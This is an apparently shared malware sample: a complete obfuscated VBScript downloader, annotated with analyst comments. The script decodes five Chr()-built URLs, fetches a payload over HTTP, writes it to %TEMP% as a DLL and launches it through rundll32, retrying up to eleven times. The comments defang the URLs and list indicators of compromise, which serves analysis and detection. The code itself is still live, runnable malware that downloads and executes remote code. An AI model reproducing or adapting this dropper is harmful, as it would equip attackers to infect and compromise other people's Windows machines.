
Malicious script

dynamoo Oct 27th, 2016 134 Never
  ' Script-wide setup. Runtime errors are suppressed from here on; the main
  ' loop at the bottom inspects Err.Number by hand after the download and
  ' write steps instead of letting the host show an error dialog.
  1. On Error Resume Next
  ' Lb8, DFm, SUo8 (and GUc on the next line) are never referenced in this
  ' listing. The 1/2/8 values resemble FileSystemObject I/O modes -- unconfirmed.
  2. Const Lb8 = 1, DFm = 2, SUo8 = 8
  ' Yp is assigned to ADODB.Stream.Type (2 = adTypeText); TLy is passed as the
  ' SaveToFile option (2 = adSaveCreateOverWrite).
  3. Const GUc = 1, Yp = 2, TLy = 2
  ' Charset given to every ADODB.Stream below: code page 437.
  4. Const Hp0 = "437"
  ' VKr1(Mo): turn an array of byte values (0..255) into a string.
  ' Values below 128 become ChrW(value); values 128..255 are first looked up in
  ' HAq8, whose entries match the code page 437 -> Unicode mapping (128 -> 199,
  ' 255 -> 160, ...). Written back through a text stream whose Charset is "437"
  ' (see XTk), such a string should encode to the original bytes, so this is the
  ' byte-preserving half of a "binary via text stream" file write.
  ' The error source text "a2s()" is what the sample itself reports on bad input.
  5. Function VKr1(Mo)
  ' Only indices 128..255 of HAq8 are filled in; 0..127 are never read.
  6. Dim HAq8(255), QXn5, OJj2
  7. HAq8(128)=199
  8. HAq8(129)=252
  9. HAq8(130)=233
  10. HAq8(131)=226
  11. HAq8(132)=228
  12. HAq8(133)=224
  13. HAq8(134)=229
  14. HAq8(135)=231
  15. HAq8(136)=234
  16. HAq8(137)=235
  17. HAq8(138)=232
  18. HAq8(139)=239
  19. HAq8(140)=238
  20. HAq8(141)=236
  21. HAq8(142)=196
  22. HAq8(143)=197
  23. HAq8(144)=201
  24. HAq8(145)=230
  25. HAq8(146)=198
  26. HAq8(147)=244
  27. HAq8(148)=246
  28. HAq8(149)=242
  29. HAq8(150)=251
  30. HAq8(151)=249
  31. HAq8(152)=255
  32. HAq8(153)=214
  33. HAq8(154)=220
  34. HAq8(155)=162
  35. HAq8(156)=163
  36. HAq8(157)=165
  37. HAq8(158)=8359
  38. HAq8(159)=402
  39. HAq8(160)=225
  40. HAq8(161)=237
  41. HAq8(162)=243
  42. HAq8(163)=250
  43. HAq8(164)=241
  44. HAq8(165)=209
  45. HAq8(166)=170
  46. HAq8(167)=186
  47. HAq8(168)=191
  48. HAq8(169)=8976
  49. HAq8(170)=172
  50. HAq8(171)=189
  51. HAq8(172)=188
  52. HAq8(173)=161
  53. HAq8(174)=171
  54. HAq8(175)=187
  55. HAq8(176)=9617
  56. HAq8(177)=9618
  57. HAq8(178)=9619
  58. HAq8(179)=9474
  59. HAq8(180)=9508
  60. HAq8(181)=9569
  61. HAq8(182)=9570
  62. HAq8(183)=9558
  63. HAq8(184)=9557
  64. HAq8(185)=9571
  65. HAq8(186)=9553
  66. HAq8(187)=9559
  67. HAq8(188)=9565
  68. HAq8(189)=9564
  69. HAq8(190)=9563
  70. HAq8(191)=9488
  71. HAq8(192)=9492
  72. HAq8(193)=9524
  73. HAq8(194)=9516
  74. HAq8(195)=9500
  75. HAq8(196)=9472
  76. HAq8(197)=9532
  77. HAq8(198)=9566
  78. HAq8(199)=9567
  79. HAq8(200)=9562
  80. HAq8(201)=9556
  81. HAq8(202)=9577
  82. HAq8(203)=9574
  83. HAq8(204)=9568
  84. HAq8(205)=9552
  85. HAq8(206)=9580
  86. HAq8(207)=9575
  87. HAq8(208)=9576
  88. HAq8(209)=9572
  89. HAq8(210)=9573
  90. HAq8(211)=9561
  91. HAq8(212)=9560
  92. HAq8(213)=9554
  93. HAq8(214)=9555
  94. HAq8(215)=9579
  95. HAq8(216)=9578
  96. HAq8(217)=9496
  97. HAq8(218)=9484
  98. HAq8(219)=9608
  99. HAq8(220)=9604
  100. HAq8(221)=9612
  101. HAq8(222)=9616
  102. HAq8(223)=9600
  103. HAq8(224)=945
  104. HAq8(225)=223
  105. HAq8(226)=915
  106. HAq8(227)=960
  107. HAq8(228)=931
  108. HAq8(229)=963
  109. HAq8(230)=181
  110. HAq8(231)=964
  111. HAq8(232)=934
  112. HAq8(233)=920
  113. HAq8(234)=937
  114. HAq8(235)=948
  115. HAq8(236)=8734
  116. HAq8(237)=966
  117. HAq8(238)=949
  118. HAq8(239)=8745
  119. HAq8(240)=8801
  120. HAq8(241)=177
  121. HAq8(242)=8805
  122. HAq8(243)=8804
  123. HAq8(244)=8992
  124. HAq8(245)=8993
  125. HAq8(246)=247
  126. HAq8(247)=8776
  127. HAq8(248)=176
  128. HAq8(249)=8729
  129. HAq8(250)=183
  130. HAq8(251)=8730
  131. HAq8(252)=8319
  132. HAq8(253)=178
  133. HAq8(254)=9632
  134. HAq8(255)=160
  ' "s" is neither declared nor read again in this listing; the result is
  ' accumulated in QXn5 instead.
  135. s = ""
  136. For OJj2 = 0 To UBound(Mo)
  ' Anything that is not a byte value raises error 50003.
  137. If Mo(OJj2) < 0 Or Mo(OJj2) > 255 Then
  138. Err.Raise 50003, "", "a2s()", "", 0
  139. ElseIf Mo(OJj2) >= 128 Then
  140. QXn5 = QXn5 & ChrW(HAq8(Mo(OJj2)))
  141. Else
  142. QXn5 = QXn5 & ChrW(Mo(OJj2))
  143. End If
  144. Next
  145. VKr1 = QXn5
  146. End Function
  ' Pp3(ISj): read the file at path ISj through an ADODB.Stream in text mode
  ' (Type = Yp, Charset = Hp0) and hand the text to SOk8.
  ' NOTE(review): SOk8 is not defined anywhere in this listing, and Pp3 itself
  ' is never called by the visible script -- it looks like leftover code from
  ' the generator that produced this sample.
  147. Function Pp3(ISj)
  ' TMr3 is declared but not used in this function.
  148. Dim Gg0, TMr3, QXn5
  149. Set Gg0 = CreateObject("ADODB.Stream")
  150. Gg0.type = Yp
  151. Gg0.Charset = Hp0
  152. Gg0.Open
  153. Gg0.LoadFromFile ISj
  154. QXn5 = Gg0.ReadText
  155. Gg0.Close
  156. Pp3 = SOk8(QXn5)
  157. End Function
  ' XTk(ISj, Mo): write the byte array Mo to the file path ISj.
  ' The bytes are converted to a string by VKr1 and written through an
  ' ADODB.Stream in text mode with Charset Hp0 ("437"); SaveToFile is called
  ' with TLy (2), so an existing file at ISj is overwritten.
  ' For triage: this is the step that puts the downloaded content on disk, and
  ' it goes through ADODB.Stream rather than Scripting.FileSystemObject.
  158. Sub XTk(ISj, Mo)
  159. Dim Gg0, QXn5
  160. Set Gg0 = CreateObject("ADODB.Stream")
  161. Gg0.type = Yp
  162. Gg0.Charset = Hp0
  163. Gg0.Open
  164. QXn5 = VKr1(Mo)
  165. Gg0.WriteText QXn5
  166. Gg0.SaveToFile ISj, TLy
  167. Gg0.Close
  168. End Sub
  ' IQm(Ks): return a Variant array with Ks elements (indices 0..Ks-1).
  ' VBScript cannot Dim a fixed array with a variable bound, so the array is
  ' obtained by splitting a string of Ks-1 spaces, which yields Ks empty strings.
  ' Ks <= 0 raises error 50001 (source text "makearrr()").
  169. Function IQm(Ks)
  ' No(0) is the ready-made one-element array returned when Ks = 1.
  170. Dim QXn5, No(0)
  171. If Ks <= 0 Then
  172. Err.Raise 50001, "", "makearrr()", "", 0
  173. ElseIf Ks = 1 Then
  174. IQm = No
  175. Else
  176. QXn5 = Space(Ks-1)
  177. IQm = Split(QXn5, " ")
  178. End If
  179. End Function
  ' MCf7(url): fetch url with a synchronous HTTP GET and return the response
  ' body as an array of byte values.
  ' Two COM HTTP clients are tried in order (WinHttp.WinHttpRequest.5.1, then
  ' MSXML2.XMLHTTP); the first one that instantiates without error is used.
  ' The HTTP status code is never checked, so whatever body the server returns
  ' (including an error page) is passed back to the caller.
  ' For triage: outbound HTTP from wscript.exe/cscript.exe is the network-side
  ' signal this function produces.
  180. Function MCf7(url)
  ' Kf1 is created below but not used inside this function.
  181. Dim Kf1, Gs, TMr3, OJj2
  182. Dim KCq, Aq9(1)
  183. Set Kf1 = CreateObject("Scripting.FileSystemObject")
  184. Aq9(0) = "WinHttp.WinHttpRequest.5.1"
  185. Aq9(1) = "MSXML2.XMLHTTP"
  186. For Each KCq in Aq9
  187. Err.Clear
  188. Set Gs = CreateObject(KCq)
  189. If Err.Number = 0 Then
  190. Exit For
  191. End If
  192. Next
  ' Third argument False = synchronous request; Send blocks until completion.
  193. Gs.Open "GET", url, False
  194. Gs.Send
  ' Copy ResponseBody one byte at a time into an array sized by IQm.
  195. TMr3 = IQm(LenB(Gs.ResponseBody))
  196. For OJj2 = 1 To LenB(Gs.ResponseBody)
  197. TMr3(OJj2-1) = AscB(MidB(Gs.ResponseBody, OJj2, 1))
  198. Next
  199. MCf7 = TMr3
  200. End Function
  ' UPx6(): return the full path of the rundll32.exe this script will launch.
  ' PROCESSOR_ARCHITECTURE is read from the System environment; when it is
  ' "amd64" the SysWOW64 copy is chosen, otherwise the system32 copy.
  ' NOTE(review): picking SysWOW64 on 64-bit Windows suggests the dropped DLL
  ' is 32-bit -- inferred, not shown by the listing.
  201. Function UPx6()
  202. Dim Ov8, ESx, VBd1
  203. Set Ov8 = CreateObject("WScript.Shell")
  204. Set ESx = Ov8.Environment("System")
  205. VBd1 = ESx("PROCESSOR_ARCHITECTURE")
  206. If LCase(VBd1) = "amd64" Then
  207. UPx6 = Ov8.ExpandEnvironmentStrings("%SystemRoot%\SysWOW64\rundll32.exe")
  208. Else
  209. UPx6 = Ov8.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll32.exe")
  210. End If
  211. End Function
  ' Ye3(VPs, FZb1, Ta7): launch the file VPs through rundll32.
  ' The command line is "<rundll32 path from UPx6> <8.3 short path of VPs>,<FZb1> <Ta7>",
  ' i.e. FZb1 is used as the export name and Ta7 as its argument, and it is
  ' started with WScript.Shell.Run.
  ' For detection: the resulting process tree is the script host (wscript.exe or
  ' cscript.exe) spawning rundll32.exe with a DLL path and export on the
  ' command line.
  212. Sub Ye3(VPs, FZb1, Ta7)
  213. Dim Ov8, Kf1, Rp3, Zb0, Bn2
  214. Set Ov8 = CreateObject("WScript.Shell")
  215. Set Kf1 = CreateObject("Scripting.FileSystemObject")
  216. Set Rp3 = Kf1.GetFile(VPs)
  ' Short (8.3) path; presumably used so the path needs no quoting.
  217. Zb0 = Rp3.ShortPath
  218. Bn2 = UPx6() + " " + Zb0 + "," + FZb1 + " " + Ta7
  ' "2 > 1" is always true: the conditional is filler and Run always executes.
  219. If 2 > 1 Then
  220. Ov8.Run(Bn2)
  221. End If
  222. End Sub
  ' DAk9(VPs): True when a file exists at path VPs (FileSystemObject.FileExists).
  223. Function DAk9(VPs)
  224. Dim Kf1
  225. Set Kf1 = CreateObject("Scripting.FileSystemObject")
  226. DAk9 = Kf1.FileExists(VPs)
  227. End Function
  ' MWp(VPs): return the 8.3 short path of the existing file VPs.
  228. Function MWp(VPs)
  229. Dim Kf1, Rp3
  230. Set Kf1 = CreateObject("Scripting.FileSystemObject")
  231. Set Rp3 = Kf1.GetFile(VPs)
  232. MWp = Rp3.ShortPath
  233. End Function
  ' Ff3(Bg, Mq7): floating-point remainder, computed as Bg - Int(Bg / Mq7) * Mq7
  ' on Doubles. MIv4 calls it with Mq7 = 1.0 to keep the fractional part of a sum.
  234. Function Ff3(Bg, Mq7)
  235. Dim Ks
  236. Ks = CDbl(Int(CDbl(Bg)/CDbl(Mq7)))
  237. Ff3 = CDbl(Bg) - Ks * CDbl(Mq7)
  238. End Function
  ' MIv4(IUj, QXn5): advance the three-element generator state in QXn5 and
  ' return an integer derived from it, Int(fraction * IUj).
  ' The multipliers and moduli (171/30269, 172/30307, 170/30323) match the
  ' Wichmann-Hill combined generator. The state array is modified in place, so
  ' successive calls with the same array yield a deterministic sequence for a
  ' given seed. Kz5 is the only caller in this listing (IUj = 256).
  239. Function MIv4(IUj, QXn5)
  240. QXn5(0) = 171 * QXn5(0) Mod 30269
  241. QXn5(1) = 172 * QXn5(1) Mod 30307
  242. QXn5(2) = 170 * QXn5(2) Mod 30323
  243. Dim SOz3
  ' Fractional part of the sum of the three scaled states.
  244. SOz3 = Ff3((CDbl(QXn5(0))/30269.0 + CDbl(QXn5(1))/30307.0 + CDbl(QXn5(2))/30323.0), 1.0)
  245. MIv4 = Int(SOz3 * CDbl(IUj))
  246. End Function
  ' Kz5(TMr3, CLn): decode a byte array and verify its trailing checksum.
  '   TMr3 - byte array: encoded payload followed by a 4-byte checksum
  '   CLn  - three-element seed for the MIv4 generator
  ' Every byte of TMr3 (modified in place) is XORed with the next MIv4(256, ...)
  ' output. The last four decoded bytes are read as a little-endian integer;
  ' the remaining bytes are the payload. The expected checksum is the global
  ' ZBk2 plus the sum of the payload bytes, modulo 1000000000. A mismatch raises
  ' error 50005; arrays with fewer than 4 elements raise 50004.
  ' NOTE: in this sample the only call to Kz5 is commented out in the main loop,
  ' so the downloaded body is written to disk without this decoding step.
  247. Function Kz5(TMr3, CLn)
  248. Dim Yr(2), DLs6, BVp, Pa0, OJj2
  249. If UBound(TMr3) < 3 Then
  250. Err.Raise 50004, "", "size of array muzt be >= 4", "", 0
  251. End If
  ' Output array holds everything except the 4 checksum bytes.
  252. DLs6 = IQm(UBound(TMr3) - 3)
  ' Copy the seed so the caller's array is not advanced by MIv4.
  253. Yr(0) = CLn(0)
  254. Yr(1) = CLn(1)
  255. Yr(2) = CLn(2)
  256. For OJj2 = 0 To UBound(TMr3)
  257. TMr3(OJj2) = TMr3(OJj2) Xor MIv4(256, Yr)
  258. Next
  ' Stored checksum: last four bytes, least significant byte first.
  259. BVp = TMr3(UBound(TMr3)-3)+(TMr3(UBound(TMr3)-2)*256)+(TMr3(UBound(TMr3)-1)*256*256)+(TMr3(UBound(TMr3))*256*256*256)
  ' Running checksum starts from the script-level value ZBk2.
  260. Pa0 = ZBk2
  261. For OJj2 = 0 To UBound(DLs6)
  262. DLs6(OJj2) = TMr3(OJj2)
  263. Pa0 = (Pa0 + TMr3(OJj2)) Mod 1000000000
  264. Next
  265. If Pa0 <> BVp Then
  266. Err.Raise 50005, "", "checksum error", "", 0
  267. End If
  268. Kz5 = DLs6
  269. End Function
  ' LLq(Ke4): random integer from CInt(Ke4 * Rnd()). Because CInt rounds, the
  ' result lies in 0..Ke4 inclusive. The main loop uses it to pick an index
  ' into the URL array.
  270. Function LLq(Ke4)
  271. LLq = CInt(Ke4*Rnd())
  272. End Function
  ' RTr1(Dc): pause the script for Dc milliseconds via WScript.Sleep.
  273. Sub RTr1(Dc)
  274. WScript.Sleep(Dc)
  275. End Sub
  ' Main body: download a file from one of five URLs, save it as a DLL in
  ' %TEMP%, and start it with rundll32, retrying up to 11 times.
  ' Observable artefacts, all taken from the lines below:
  '   - file  %TEMP%\e134dkdCXFS.dll
  '   - marker file  <8.3 short path of that DLL>.txt  (its presence ends the script)
  '   - rundll32 command line with export "EnhancedStoragePasswordConfig" and argument "147"
  '   - download URLs, decoded from the Chr() concatenations and defanged here:
  '       hxxp://actiononsports[.]com/kq0u93a1
  '       hxxp://dmtya[.]ru/mpozceu
  '       hxxp://callideo[.]fr/msn9ar
  '       hxxp://flutygoy[.]net/82okzzkq
  '       hxxp://theatosc[.]net/8j3wm
  ' Seeds Rnd(), which LLq uses for URL selection.
  276. Randomize
  277. Dim WAz(2), ZBk2, YAz(4), ISj
  ' WAz is the generator seed that would be passed to Kz5; with the Kz5 call
  ' commented out below, WAz is not used at run time.
  278. WAz(0) = 25482
  279. WAz(1) = 2072
  280. WAz(2) = 22148
  ' Initial checksum value read by Kz5.
  281. ZBk2 = 32
  ' The URLs are assembled character by character (mixed-case cHr, mixed & and +)
  ' so that no URL appears as a plain string in the file.
  282. YAz(0)=cHr(104) & cHr(116) + cHr(116) & cHr(112) + cHr(58) + cHr(47) + cHr(47) + cHr(97) + "c" + cHr(116) & cHr(105) + cHr(111) & cHr(110) & cHr(111) & cHr(110) + cHr(115) & "p" & cHr(111) + cHr(114) + cHr(116) & cHr(115) + cHr(46) & cHr(99) + cHr(111) & cHr(109) & cHr(47) + cHr(107) + cHr(113) + "0" + cHr(117) + "9" + "3" & cHr(97) + cHr(49)
  283. YAz(1)=cHr(104) + "t" + cHr(116) & "p" + cHr(58) + "/" & cHr(47) + cHr(100) & cHr(109) & cHr(116) & cHr(121) & cHr(97) + cHr(46) + cHr(114) + "u" + cHr(47) + cHr(109) + cHr(112) & "o" + "z" + cHr(99) & "e" + cHr(117)
  284. YAz(2)="h" & cHr(116) + cHr(116) & "p" + cHr(58) + "/" + cHr(47) + cHr(99) + "a" & cHr(108) & cHr(108) + cHr(105) & cHr(100) + "e" & "o" & cHr(46) + cHr(102) + cHr(114) & cHr(47) & "m" + cHr(115) + "n" + "9" & "a" + cHr(114)
  285. YAz(3)=cHr(104) & cHr(116) & cHr(116) & cHr(112) + cHr(58) & cHr(47) + cHr(47) & cHr(102) & cHr(108) & cHr(117) & cHr(116) + cHr(121) & "g" & "o" & cHr(121) + cHr(46) & cHr(110) & cHr(101) + cHr(116) + cHr(47) & cHr(56) + cHr(50) & cHr(111) + cHr(107) + "z" + cHr(122) + cHr(107) & cHr(113)
  286. YAz(4)=cHr(104) + cHr(116) + "t" + "p" & cHr(58) & cHr(47) + "/" + cHr(116) + "h" + "e" + cHr(97) + cHr(116) + cHr(111) + "s" + cHr(99) + cHr(46) & cHr(110) + cHr(101) & cHr(116) + cHr(47) + cHr(56) + cHr(106) + cHr(51) & cHr(119) & cHr(109)
  ' Base name of the dropped file.
  287. ISj = "e134dkdCXFS"
  ' Ov8 is declared here but the shell object is stored in the undeclared
  ' name objShell on the next line.
  288. Dim Ov8, Yl8, TKh, Rd
  289. Set objShell = CreateObject("WScript.Shell")
  ' "%" & "TEMP%" splits the variable name so "%TEMP%" is not a literal in the file.
  290. Yl8 = objShell.ExpandEnvironmentStrings("%" & "TEMP%")
  291. TKh = Yl8 & "\" & ISj & ".dll"
  292. Dim VZx1, EYi7, Bd, Hp, OJj2
  ' EYi7 records whether the file has already been downloaded and written.
  293. EYi7 = False
  ' Up to 11 attempts. The inner "Do ... Loop While False" runs exactly once per
  ' iteration, so each "Exit Do" skips the rest of that attempt and moves on to
  ' the next one.
  294. For OJj2=0 To 10: Do
  ' If both the DLL and its "<short path>.txt" companion exist, quit with
  ' exit code 0. The listing does not create the .txt itself; presumably the
  ' launched DLL does -- unconfirmed.
  295. If DAk9(TKh) Then
  296. Rd = MWp(TKh) & ".txt"
  297. If DAk9(Rd) Then
  298. WScript.Quit(0)
  299. End If
  300. End If
  301. If Not EYi7 Then
  ' Random URL index in 0..4.
  302. VZx1 = LLq(UBound(YAz))
  303. Bd = MCf7(YAz(VZx1))
  304. If Err.Number <> 0 Then
  305. Exit Do
  306. End If
  ' The Kz5 decode/checksum step is commented out: the response body is used as is.
  307. Hp = Bd  ' Kz5(Bd, WAz)
  308. If Err.Number <> 0 Then
  309. Exit Do
  310. End If
  311. XTk TKh, Hp
  312. If Err.Number <> 0 Then
  313. Exit Do
  314. End If
  315. EYi7 = True
  316. End If
  ' Launch the written file via rundll32, then wait 24999 ms before the next
  ' pass re-checks for the marker file.
  317. Ye3 TKh, "EnhancedStoragePasswordConfig", "147"
  318. RTr1 24999
  319. Loop While False: Next
  ' "2=2" is always true: after the loop is exhausted the script exits with code 1.
  320. If 2=2 Then
  321. WScript.Quit(1)
  322. End If